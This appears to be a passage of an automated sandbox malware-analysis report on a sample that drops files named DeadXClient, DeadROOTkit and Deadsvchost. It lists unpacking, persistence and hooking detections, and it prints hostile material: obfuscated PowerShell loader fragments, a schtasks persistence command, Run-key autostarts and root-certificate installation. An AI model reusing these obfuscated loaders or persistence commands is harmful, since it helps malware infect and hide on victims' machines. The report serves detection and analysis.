                          Source: Deadsvchost.exe.1.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: Deadsvchost.exe.1.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: DeadROOTkit.exe.2.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: DeadROOTkit.exe.2.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: DeadROOTkit.exe.2.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                          .NET source code contains potential unpacker
                          Source: DeadXClient.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                          Source: DeadXClient.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                          Source: DeadXClient.exe.0.dr, Messages.cs.Net Code: Memory
                          Source: DeadROOTkit.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                          Source: DeadROOTkit.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                          Source: DeadROOTkit.exe.0.dr, Messages.cs.Net Code: Memory
                          Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                          Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                          Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Messages.cs.Net Code: Memory
                          Source: Deadsvchost.exe.1.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                          Source: Deadsvchost.exe.1.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                          Source: Deadsvchost.exe.1.dr, Messages.cs.Net Code: Memory
                          Source: DeadROOTkit.exe.2.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                          Source: DeadROOTkit.exe.2.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                          Source: DeadROOTkit.exe.2.dr, Messages.cs.Net Code: Memory
                          Found suspicious powershell code related to unpacking or dynamic code loading
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer($LadMSRasXMAaNc,$SsrFUvzfWALaJuFfDwp).Invoke(''+'a'+''+[Char](109)+''+'s'+'i.'+[Char](100)+'ll');$BNdTdCEoXMsXuDwEG=$zjaDRBJuPBhArz.Invoke($Null,@([Object]$HSvqCok,[Objec
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char]
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+'T'+[Char](87)+'A'+[Char](82)+'E').GetValue(''+[Char](68)+'e'+'a'+''+'d'+''+[Char](115)+''+'t'+'a'+[Cha
                          Obfuscated command line found
                          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:bubCglTffNzZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QBDRAqnALMmwja,[Parameter(Position=1)][Type]$duQqlSyxSK)$pNdjVVbnfJT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+''+'r'+'y'+[Char](77)+'o'+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'De'+'l'+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+','+'S'+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+'Au'+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$pNdjVVbnfJT.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+'y'+[Char](83)+'i'+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QBDRAqnALMmwja).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$pNdjVVbnfJT.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+[Char](121)+''+'S'+''+'i'+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+','+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+'l'+'',$duQqlSyxSK,$QBDRAqnALMmwja).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $pNdjVVbnfJT.CreateType();}$RJkdRlkUxkpOh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+'s'+''+[Char](111)+''+'f'+'t.W'+[Char](105)+'n'+[Char](51)+'2.'+[Char](85)+''+[Char](110)+'s'+[Char](97)+'f
                          Suspicious powershell command line found
                          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:bubCglTffNzZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QBDRAqnALMmwja,[Parameter(Position=1)][Type]$duQqlSyxSK)$pNdjVVbnfJT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+''+'r'+'y'+[Char](77)+'o'+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'De'+'l'+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+','+'S'+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+'Au'+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$pNdjVVbnfJT.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+'y'+[Char](83)+'i'+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QBDRAqnALMmwja).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$pNdjVVbnfJT.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+[Char](121)+''+'S'+''+'i'+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+','+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+'l'+'',$duQqlSyxSK,$QBDRAqnALMmwja).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $pNdjVVbnfJT.CreateType();}$RJkdRlkUxkpOh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+'s'+''+[Char](111)+''+'f'+'t.W'+[Char](105)+'n'+[Char](51)+'2.'+[Char](85)+''+[Char](110)+'s'+[Char](97)+'f
                          Source: C:\Users\Public\DeadXClient.exeCode function: 1_2_00007FFD9B7F00AD pushad ; iretd 1_2_00007FFD9B7F00C1
                          Source: C:\Users\Public\DeadROOTkit.exeCode function: 2_2_00007FFD9B80885D pushad ; ret 2_2_00007FFD9B8088EB
                          Source: C:\Users\Public\DeadROOTkit.exeCode function: 2_2_00007FFD9B8088A8 pushad ; ret 2_2_00007FFD9B8088EB
                          Source: C:\Users\Public\DeadROOTkit.exeCode function: 2_2_00007FFD9B8000AD pushad ; iretd 2_2_00007FFD9B8000C1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B7EDBB5 pushad ; iretd 4_2_00007FFD9B7EDC59
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B7E63FB push ebx; retf 000Ah4_2_00007FFD9B7E641A
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B7EDC35 pushad ; iretd 4_2_00007FFD9B7EDC59
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B7EDC40 pushad ; iretd 4_2_00007FFD9B7EDC59
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B7E00AD pushad ; iretd 4_2_00007FFD9B7E00C1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9BA651EB push ecx; iretd 4_2_00007FFD9BA651EC
                          Source: C:\Windows\System32\dllhost.exeCode function: 6_3_000002E86A0786ED push rcx; retf 003Fh6_3_000002E86A0786EE
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B6BD2A5 pushad ; iretd 7_2_00007FFD9B6BD2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B7D00AD pushad ; iretd 7_2_00007FFD9B7D00C1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B8A2316 push 8B485F94h; iretd 7_2_00007FFD9B8A231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B8A26C9 pushad ; retf 7_2_00007FFD9B8A26E9
                          Source: C:\Windows\System32\winlogon.exeCode function: 11_3_00000225DC6286ED push rcx; retf 003Fh11_3_00000225DC6286EE
                          Source: C:\Windows\System32\lsass.exeCode function: 12_3_00000202C0AC86ED push rcx; retf 003Fh12_3_00000202C0AC86EE
                          Source: C:\Users\Public\Deadsvchost.exeCode function: 13_2_00007FFD9B8000AD pushad ; iretd 13_2_00007FFD9B8000C1
                          Source: C:\Windows\System32\svchost.exeCode function: 14_3_000002A6612E86ED push rcx; retf 003Fh14_3_000002A6612E86EE
                          Source: C:\Windows\System32\dwm.exeCode function: 16_3_000002BAAF1F86ED push rcx; retf 003Fh16_3_000002BAAF1F86EE
                          Source: C:\Windows\System32\svchost.exeCode function: 17_3_0000026A879A86ED push rcx; retf 003Fh17_3_0000026A879A86EE
                          Source: C:\Windows\System32\svchost.exeCode function: 19_3_00000179537886ED push rcx; retf 003Fh19_3_00000179537886EE
                          Source: C:\Windows\System32\svchost.exeCode function: 20_3_000002295D5486ED push rcx; retf 003Fh20_3_000002295D5486EE

                          Persistence and Installation Behavior

                          barindex
                          Installs new ROOT certificates
                          Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                          Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeFile created: C:\Users\Public\DeadROOTkit.exeJump to dropped file
                          Source: C:\Users\Public\DeadROOTkit.exeFile created: C:\Users\user\AppData\Local\DeadROOTkit.exeJump to dropped file
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeFile created: C:\Users\Public\DeadXClient.exeJump to dropped file
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeFile created: C:\Users\Public\DeadCodeRootKit.exeJump to dropped file
                          Source: C:\Users\Public\DeadXClient.exeFile created: C:\Users\Public\Deadsvchost.exeJump to dropped file
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeFile created: C:\Users\Public\DeadROOTkit.exeJump to dropped file
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeFile created: C:\Users\Public\DeadXClient.exeJump to dropped file
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeFile created: C:\Users\Public\DeadCodeRootKit.exeJump to dropped file
                          Source: C:\Users\Public\DeadXClient.exeFile created: C:\Users\Public\Deadsvchost.exeJump to dropped file

                          Boot Survival

                          barindex
                          Creates multiple autostart registry keys
                          Source: C:\Users\Public\DeadXClient.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DeadsvchostJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DeadROOTkitJump to behavior
                          Drops PE files to the user root directory
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeFile created: C:\Users\Public\DeadROOTkit.exeJump to dropped file
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeFile created: C:\Users\Public\DeadXClient.exeJump to dropped file
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeFile created: C:\Users\Public\DeadCodeRootKit.exeJump to dropped file
                          Source: C:\Users\Public\DeadXClient.exeFile created: C:\Users\Public\Deadsvchost.exeJump to dropped file
                          Uses schtasks.exe or at.exe to add and modify task schedules
                          Source: C:\Users\Public\DeadXClient.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe"
                          Source: C:\Users\Public\DeadXClient.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Deadsvchost.lnkJump to behavior
                          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\DeadROOTkit
                          Source: C:\Users\Public\DeadXClient.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Deadsvchost.lnkJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeadROOTkit.lnkJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DeadsvchostJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DeadsvchostJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DeadROOTkitJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DeadROOTkitJump to behavior

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Hooks files or directories query functions (used to hide files and directories)
                          Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
                          Hooks processes query functions (used to hide processes)
                          Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
                          Hooks registry keys query functions (used to hide registry keys)
                          Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
                          Loading BitLocker PowerShell Module
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Modifies the prolog of user mode functions (user mode inline hooks)
                          Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE DeadstagerJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
